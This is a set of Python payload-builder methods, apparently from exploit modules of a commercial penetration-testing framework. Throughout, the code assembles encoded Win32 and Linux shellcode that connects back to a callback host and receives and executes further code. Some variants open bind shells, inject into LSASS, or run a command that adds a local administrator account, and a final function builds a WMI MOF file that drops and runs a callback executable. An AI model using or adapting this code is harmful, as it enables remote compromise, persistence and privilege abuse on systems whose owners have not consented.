def createShellcode(self): #self.shellcode="\xcc"*400 #return 1 host=self.callback.ip port=self.callback.port import shellcodeGenerator sc=shellcodeGenerator.win32() #no gocode - too big #sc.addAttr("GOFindSock",None) #sc.addAttr("LoadRegAsFD", {"reg" : "esi"}) #sc.addAttr("RecvExecWin32",{"socketreg": "FDSPOT"}) #MOSDEF sc.addAttr("tcpconnect",{"port":port,"ipaddress":host}) sc.addAttr("RecvExecWin32",{"socketreg": "FDSPOT"}) #MOSDEF sc.addAttr("UseWS2Ordinal",None) rawshellcode=sc.get() import xorencoder enc=xorencoder.simpleXOR() enc.subesp=5000 enc.setbadstring(self.badstring) ret=enc.find_key(rawshellcode) if ret==0: self.log("Could not generate key for this shellcode!") raise Exception, "No shellcode generated" self.shellcode=enc.encode(rawshellcode) if self.shellcode=="": raise Exception, "No shellcode generated" self.log("Xor key used: %x"%enc.getkey()) self.log("Length of shellcode=%s"%len(self.shellcode)) return ret
def createShellcode(self): sc = shellcodeGenerator.win32() #sc.addAttr("revert_to_self_before_importing_ws2_32",None) sc.addAttr("unhandled_exception_filter", None) #sc.addAttr("debugme", None) sc.addAttr("GOFindSock", None) sc.addAttr("RecvExecWin32", None) #sc.addAttr("LoadRegAsFD", {"reg" : "esi"}) #sc.addAttr("tcpconnect",{"port":localport,"ipaddress":localhost}) #sc.addAttr("initstackswap",None) #sc.addAttr("stackSwap",None) raw = sc.get() encoder = chunkedaddencoder.intelchunkedaddencoder() encoder.setbadstring(self.badstring) #tag it for the searcher self.shellcode = "AAAAAAAA\xeb\x08" + self.tag2 + self.tag1 + encoder.encode( raw) #now do search shellcode raw = win32shell.getsearchcode(self.tag1, self.tag2) self.log("Doing printable encoding - takes some time...") encoder = printable.intelprintableencoder() encoder.setESPMod( 3700) #put this large enough that esp points at least 200 #bytes below your shellcode encoder.setbadchars(self.searchbadstring) data = encoder.encode(raw) self.encodedsearchcode = data #print "%d: length=%d (from %d) Data=%s"%(isprint(data),len(data),len(raw),data) self.log("Done with printable encoding") return
def createShellcode(self): #sc = shellcodeGenerator.win32() #sc.addAttr("findeipnoesp", None) #sc.addAttr("MessageBeep", None) #sc.addAttr("MessageBox", ["HELLO"]) #sc = sc.get() sc = shellcodeGenerator.win32() sc.addAttr('tcpconnect', { 'port': self.callback.port, 'ipaddress': self.callback.ip }) sc.addAttr('SmallRecvExecWin32', {'socketreg': 'FDSPOT'}) sc.addAttr('UseWS2Ordinal', None) sc = sc.get() print "XXX: pre-encoding %d" % len(sc) encoder = alphanumeric.AlphaNum() totopc = encoder.seh_pc() # leaves pc in ecx getpc = encoder.get_pc(reg='ecx') payload = encoder.encode(sc) self.shellcode = totopc + getpc + payload print self.shellcode print "XXX: post-encoding %d" % len(self.shellcode) if self.shellcode == "": self.log("Problem encoding shellcode") return 0 return self.shellcode
def createShellcode(self): #localhost=self.callback.ip #localport=self.callback.port sc = shellcodeGenerator.win32() #sc.addAttr("ForkLoad", None) # the to fork code sc.addAttr("findeipnoesp", {"subespval": self.subesp}) #don't mess with eip sc.addAttr("isapiGOFindSock", None) sc.addAttr("ExitThread", None) #set up the shellcode self.shellcode = sc.get() self.log("Size of raw shellcode is %d" % len(self.shellcode)) encoder = chunkedaddencoder.intelchunkedaddencoder() #these are the characters not allowed by the exploit encoder.setbadstring(self.badstring) self.log( "Encoding shellcode. This may take a while if we don't find a good value in the cache." ) shellcode = encoder.encode(self.shellcode) self.log("Done encoding shellcode.") if shellcode == "": self.log("Could not encode shellcode") return 0 #debug int #shellcode="\xcc"+shellcode self.setShellcode(shellcode) self.log("Size of encoded shellcode is %d" % len(self.shellcode)) return 1
def createShellcode(self): import shellcodeGenerator sc = shellcodeGenerator.win32() sc.addAttr('findeipnoesp', {'subespval': 0}) sc.addAttr('revert_to_self_before_importing_ws2_32', None) sc.addAttr('tcpconnect', { 'port': self.callback.port, 'ipaddress': self.callback.ip }) sc.addAttr('CreateThreadRecvExecWin32', {'socketreg': 'FDSPOT'}) #MOSDEF sc.addAttr('ExitThread', None) rawshellcode = sc.get() import xorencoder encoder = xorencoder.simpleXOR() encoder.setbadstring(self.badstring) ret = encoder.find_key(rawshellcode) if ret == 0: self.log('Could not find a key for this shellcode!') raise Exception, 'No shellcode generated' self.shellcode = encoder.encode(rawshellcode) if self.shellcode == '': raise Exception, 'No shellcode generated' self.log('Xor key used: %x' % (encoder.getkey())) self.log('Length of shellcode=%s' % (len(self.shellcode))) return self.shellcode
def createShellcode(self): localhost = self.callback.ip localport = self.callback.port if self.version == 0: self.localhost = localhost self.localport = localport return "" if self.versions[self.version][0].count("Windows"): sc = shellcodeGenerator.win32() #sc.addAttr("ForkLoad", None) # the to fork code #sc.addAttr("revert_to_self_before_importing_ws2_32", None) #sc.addAttr("unhandled_exception_filter",None) self.log("Generating shellcode with port %s and ip %s" % (localport, localhost)) sc.addAttr("tcpconnect", { "port": localport, "ipaddress": localhost }) sc.addAttr("RecvExecWin32", {"socketreg": "FDSPOT"}) #MOSDEF self.shellcode = sc.get() self.log("Raw win32 shellcode length: %d" % len(self.shellcode)) #return self.createWin32Shellcode(self.badstring,localhost,localport) elif self.versions[self.version][0].count("Linux"): #self.shellcode="\xcc"*500 myshellcode = shellcodeGenerator.linux_X86() if localport == 0: self.log("Why is port zero?") return "" myshellcode.addAttr("connect", { "ipaddress": localhost, "port": localport }) myshellcode.addAttr("read_and_exec", {"fdreg": "esi"}) self.shellcode = myshellcode.get() else: self.log("Cannot yet create shellcode for version %d" % self.version) return "" encoder = chunkedaddencoder.intelchunkedaddencoder() encoder.setbadstring(self.badstring) self.log("Encoding shellcode") self.shellcode = encoder.encode(self.shellcode) #self.shellcode = "\xcc"+self.shellcode if self.shellcode == "": self.log("Problem encoding shellcode") return 0 self.log("Shellcode length: %d" % len(self.shellcode)) if len(self.shellcode) > 1020: self.log( "Warning shellcode is %d bytes - longer than the 1020 available..." % (len(self.shellcode))) return self.shellcode
def createShellcode(self): import shellcodeGenerator port = self.callback.port host = self.callback.ip sc = shellcodeGenerator.win32() sc.addAttr('tcpconnect', {'port': port, 'ipaddress': host}) sc.addAttr('SmallRecvExecWin32', {'socketreg': 'FDSPOT'}) #MOSDEF sc.addAttr('UseWS2Ordinal', None) self.shellcode = sc.get() return self.shellcode
def createShellcode(self): sc=shellcodeGenerator.win32() sc.addAttr('findeipnoesp',{'subespval':0}) #don't mess with eip sc.addAttr('revert_to_self_before_importing_ws2_32',None) sc.addAttr('tcpconnect',{'port':self.callback.port,'ipaddress':self.callback.ip}) sc.addAttr('loadFDasreg',{'reg':'esi'}) sc.addAttr('RecvExecDepSafe',None) sc.addAttr('ExitThread',None) self.callback.argsDict['fromcreatethread']=0 self.shellcode=sc.get() return self.shellcode
def createShellcode(self): sc = shellcodeGenerator.win32() sc.addAttr('SearchCodeSafeSEH', {'tag': 0x6b303063}) #'c00k' sc.standalone = 1 rawshellcode = sc.get() encoder = xorencoder.simpleXOR() encoder.setbadstring(self.badstring) encoder.find_key(rawshellcode) self.searchcode = encoder.encode(rawshellcode) #print len(self.searchcode),repr(self.searchcode) self.createWin32Shellcode('', self.callback.ip, self.callback.port) return self.shellcode
def gocode_createShellcode(self): sc = shellcodeGenerator.win32() sc.addAttr("GOFindSock", {"setblocking": 1}) sc.addAttr("RecvExecWin32", None) self.shellcode = sc.get() encoder = chunkedaddencoder.intelchunkedaddencoder() encoder.setbadstring(self.badstring) self.log("Encoding shellcode") self.shellcode = encoder.encode(self.shellcode) if self.shellcode == "": self.log("Problem encoding shellcode") return 0 return self.shellcode
def createShellcode(self): host = self.callback.ip port = self.callback.port sc = shellcodeGenerator.win32() # we want to get a single clean instance sc.standalone = 1 sc.addAttr("ASN1Stage0", None) self.shellcode = sc.get() # we need the localhost and localport in stage2 # this is called from GUI with our localhost and port as args self.localhost = host self.localport = port self.log("Stage one payload is %d bytes" % len(self.shellcode)) return self.shellcode
def createShellcode(self): host = self.callback.ip port = self.callback.port import shellcodeGenerator sc = shellcodeGenerator.win32() sc.addAttr('findeipnoesp', {'subespval': 0}) if host == '0.0.0.0': sc.addAttr('BindMosdef', {'port': port}) else: sc.addAttr('tcpconnect', {'port': port, 'ipaddress': host}) sc.addAttr('RecvExecWin32', {'socketreg': 'FDSPOT'}) #MOSDEF sc.addAttr('ExitThread', None) self.shellcode = sc.get() return self.shellcode
def createStageTwoShellcode(self): s2sc = shellcodeGenerator.win32() # our fd is in esi # save the register before the import loops s2sc.addAttr("findeip", {"savereg": "esi"}) # restore the register and load it to FDSPOT # which is used by initstackswap and stackswap s2sc.addAttr("LoadSavedRegAsFD", {"reg": "esi"}) self.log("Creating stage two payload") s2sc.addAttr("initstackswap", None) s2sc.addAttr("stackSwap", None) self.stagetwo = s2sc.get() if self.stagetwo == "": self.log("Problem building stage two payload") return 0 return self.stagetwo
def sc_mkwin32canvas(localaddr,badstring,subesp=0): import sys sys.path.append("shellcode") import shellcodeGenerator from canvasexploit import canvasexploit sc=shellcodeGenerator.win32() sc.addAttr("findeipnoesp",{"subespval": 0x400}) #don't mess with eip sc.addAttr("revert_to_self_before_importing_ws2_32", None) #sc.addAttr("BindMosdef", {"port" : 12331 }) sc.addAttr("tcpconnect", {"port" : localaddr[1], "ipaddress" : localaddr[0]}) sc.addAttr("RecvExecWin32",{"socketreg": "FDSPOT"}) #MOSDEF sc.addAttr("ExitThread",None) return canvasexploit().intel_encode(badstring,sc.get())
def createShellcode(self): host = self.callback.ip port = self.callback.port self.remoteport = port sc = shellcodeGenerator.win32() sc.addAttr("tcpconnect", {"port": port, "ipaddress": host}) sc.addAttr("RecvExecWin32", {"socketreg": "FDSPOT"}) #MOSDEF #sc.addAttr("initstackswap", None) #sc.addAttr("stackSwap", None) self.shellcode = sc.get() encoder = chunkedaddencoder.intelchunkedaddencoder() encoder.setbadstring(self.badstring) self.log("Encoding shellcode") self.shellcode = encoder.encode(self.shellcode) if self.shellcode == "": self.log("Problem encoding shellcode") return 0 return self.shellcode
def createShellcode(self): #host=self.callback.ip #port=self.callback.port sc = shellcodeGenerator.win32() """ we set the GOcode search range to start at 0x180 so we dont tread on low range pipes that seem to hate getpeername """ sc.addAttr("GOFindSock", None) sc.addAttr("RecvExecWin32", None) self.shellcode = sc.get() encoder = chunkedaddencoder.intelchunkedaddencoder() encoder.setbadstring(self.badstring) self.log("Encoding shellcode") self.shellcode = encoder.encode(self.shellcode) if self.shellcode == "": self.raiseError("Problem encoding shellcode") self.log("Shellcode len: %d"% len(self.shellcode)) return self.shellcode
def createShellcode(self): host = self.callback.ip port = self.callback.port self.localhost = host self.localport = port sc = shellcodeGenerator.win32() shellcode = self.createHeapSafeInjectIntoProcess( self.badstring, host, port, smallcode=0, processname="LSASS.EXE") import mosdef # GET EIP, MOV "ret", -0x10(%eip) selfmodify = "\xe8\xff\xff\xff\xff\xc3\x5f" + mosdef.assemble( "movl $0x4141feeb, -0x10(%edi)", "X86") self.shellcode = "\x42" * 0x50 + selfmodify + shellcode self.log("length of real shellcode: %d" % (len(self.shellcode))) return self.shellcode
def createShellcode(self): sc = shellcodeGenerator.win32() sc.addAttr('findeipnoesp', {'subespval': 0}) sc.addAttr('revert_to_self_before_importing_ws2_32', None) sc.addAttr('tcpconnect', { 'port': self.callback.port, 'ipaddress': self.callback.ip }) mosdef_type = self.engine.getMosdefType(canvasengine.WIN32MOSDEF_INTEL) mosdef_id = self.engine.getNewMosdefID(self) sc.addAttr("send_universal", { "mosdef_type": mosdef_type, "mosdef_id": mosdef_id }) sc.addAttr("RecvExecDepSafe", {'socketreg': 'FDSPOT'}) sc.vAllocSelf = True self.shellcode = sc.get() logging.info("Shellcode size: %d" % len(self.shellcode)) return self.shellcode
def messagebox_createShellcode(self): """ This createShellcode displays a message when the exploit is successful """ sc = shellcodeGenerator.win32() sc.addAttr("findeipnoesp", None) sc.addAttr("MessageBeep", None) sc.addAttr("MessageBox", ["HELLO"]) #sc.addAttr("MessageBox", ["HOW ARE YOU?"]) #sc.addAttr("ExitProcess", None) self.shellcode = sc.get() encoder = chunkedaddencoder.intelchunkedaddencoder() encoder.setbadstring(self.badstring) self.log("Encoding shellcode") self.shellcode = encoder.encode(self.shellcode) if self.shellcode == "": self.log("Problem encoding shellcode") return 0 return self.shellcode
def createStageTwoShellcode(self): host = self.callback.ip port = self.callback.port self.log("Creating stage two payload") sc = shellcodeGenerator.win32() # using a custom findeip that keeps using current esp sc.foundeip = 1 sc.addAttr("CreateThreadFindeip", None) sc.addAttr("revert_to_self_before_importing_ws2_32", None) sc.addAttr("tcpconnect", {"port": port, "ipaddress": host}) #sc.addAttr("initstackswap", None) sc.addAttr("RecvExecWin32", {"socketreg": "FDSPOT"}) #MOSDEF #sc.addAttr("CreateThreadRecvExecWin32",{"socketreg": "FDSPOT"}) #MOSDEF #sc.addAttr("stackSwap", None) sc.addAttr("ExitThread", None) raw = sc.get() self.stagetwo = raw self.log("Stage two payload is %d bytes" % len(self.stagetwo)) return self.stagetwo
def createShellcode(self): if self.version == 3: import shellcode.clean.windows.payloads as payloads p = payloads.payloads() sc = p.win32_exec( "cmd.exe /c net user c c /ADD && net localgroup administrators c /ADD" ) rawshellcode = p.assemble(sc) else: sc = shellcodeGenerator.win32() sc.addAttr('findeipnoesp', {'subespval': self.subesp}) if self.version == 1: sc.addAttr('Fix RtlEnterCriticalSection', {'SimpleFix': 1}) if self.callback.ip == '0.0.0.0': sc.addAttr('BindMosdef', {'port': self.callback.port}) else: sc.addAttr('tcpconnect', { 'port': self.callback.port, 'ipaddress': self.callback.ip }) sc.addAttr('RecvExecWin32', {'socketreg': 'FDSPOT'}) #MOSDEF sc.addAttr('ExitThread', None) rawshellcode = sc.get() encoder = xorencoder.simpleXOR() encoder.setbadstring(self.badstring) ret = encoder.find_key(rawshellcode) if ret == 0: self.log('Could not find a key for this shellcode!') raise Exception, 'No shellcode generated' self.shellcode = encoder.encode(rawshellcode) if self.shellcode == '': raise Exception, 'No shellcode generated' self.log('Xor key used: %x' % (encoder.getkey())) self.log('Length of shellcode=%s' % (len(self.shellcode))) self.shellcode = '\x90' * (487 - len(self.shellcode)) + self.shellcode return self.shellcode
def createShellcode(self): # if -l -d is set, switch to bind mode !!! sc = shellcodeGenerator.win32() if self.callback and self.callback.ip == "0.0.0.0": # switching to BindMosdef mode sc.foundeip = 1 # Icecast specific sc.addAttr("CreateThreadFindeip", None) sc.addAttr("revert_to_self_before_importing_ws2_32", None) # end of Icecast specific sc.addAttr("BindMosdef", {"port": self.callback.port}) sc.addAttr("RecvExecWin32", {"socketreg": "FDSPOT"}) else: sc.foundeip = 1 sc.addAttr("CreateThreadFindeip", None) sc.addAttr("revert_to_self_before_importing_ws2_32", None) sc.addAttr("GOFindSock", None) sc.addAttr("RecvExecWin32", None) self.shellcode = sc.get() if len(self.shellcode) < 824: self.shellcode = "A" * (824 - len(self.shellcode)) + self.shellcode print "[!] size: %d" % len(self.shellcode) encoder = chunkedaddencoder.intelchunkedaddencoder() encoder.setbadstring(self.badstring) self.log("Encoding shellcode") self.shellcode = encoder.encode(self.shellcode) if self.shellcode == "": self.log("Problem encoding shellcode") return 0 return self.shellcode
def generateMOF(self): sc=shellcodeGenerator.win32() sc.addAttr('findeipnoesp', {'subespval':0}) sc.addAttr('revert_to_self_before_importing_ws2_32', None) sc.addAttr('tcpconnect', {'port': self.callback.port, 'ipaddress':self.callback.ip}) mosdef_type=self.engine.getMosdefType(canvasengine.WIN32MOSDEF_INTEL) mosdef_id=self.engine.getNewMosdefID(self) self.log("Creating MOSDEF ID: %d"%mosdef_id) sc.addAttr('send_universal',{'mosdef_type': mosdef_type,'mosdef_id':mosdef_id}) sc.addAttr('RecvExecDepSafe',{'socketreg':'FDSPOT'}) sc.addAttr('ExitProcess',None) sc.vAllocSelf=True callback_payload=sc.get() myPElib=pelib.PElib() binary=myPElib.createPEFileBuf(callback_payload) vbs='' for i in range(0,len(binary),8): vbs+='"binary = binary & \\"' for j in range(8): if (i+j)>=len(binary): break vbs+='%02x'%(ord(binary[i+j])) if (i+j)!=len(binary)-1: vbs+=',' vbs+='\\"\\n"\n' vbs+='"tmp = Split(binary, \\",\\")\\n"\n' vbs+='"Set fso = CreateObject(\\"Scripting.FileSystemObject\\")\\n"\n' vbs+='"Set shell = CreateObject(\\"WScript.Shell\\")\\n"\n' vbs+='"userprofile = shell.ExpandEnvironmentStrings(\\"%USERPROFILE%\\")\\n"\n' vbs+='"path = userprofile & \\"\\\\\\" & \\"cb%d.exe\\"\\n"\n'%(random.randint(1,99)) vbs+='"Set f = fso.CreateTextFile(path, True)\\n"\n' vbs+='"For i = 0 To UBound(tmp)\\n"\n' vbs+='" b = Int(\\"&H\\" & tmp(i))\\n"\n' vbs+='" f.Write Chr(b)\\n"\n' vbs+='"Next\\n"\n' vbs+='"f.Close\\n"\n' vbs+='"shell.Run Chr(34) & path & Chr(34), 7, false\\n"' mof="""#pragma namespace ("\\\\\\\\.\\\\root\\\\subscription") #pragma deleteclass("MyASEventConsumer", nofail) #pragma deleteinstance("__EventFilter.Name=\\\"EF\\\"", nofail) #pragma deleteinstance("ActiveScriptEventConsumer.Name=\\\"ASEC\\\"", nofail) class MyASEventConsumer { [key]string Name; }; instance of ActiveScriptEventConsumer as $CONSUMER { CreatorSID = {1,2,0,0,0,0,0,5,32,0,0,0,32,2,0,0}; Name = "ASEC"; ScriptingEngine = "VBScript"; ScriptText = SCRIPT; }; instance of __EventFilter as $FILTER { CreatorSID = {1,2,0,0,0,0,0,5,32,0,0,0,32,2,0,0}; Name = "EF"; Query = "SELECT * FROM __InstanceCreationEvent" " WHERE TargetInstance.__class = \\"MyASEventConsumer\\""; QueryLanguage = "WQL"; }; instance of __FilterToConsumerBinding as $BINDING { CreatorSID = {1,2,0,0,0,0,0,5,32,0,0,0,32,2,0,0}; Filter = $FILTER; Consumer = $CONSUMER; }; instance of MyASEventConsumer { Name = "Trigger"; }; """.replace('SCRIPT',vbs) #print mof return mof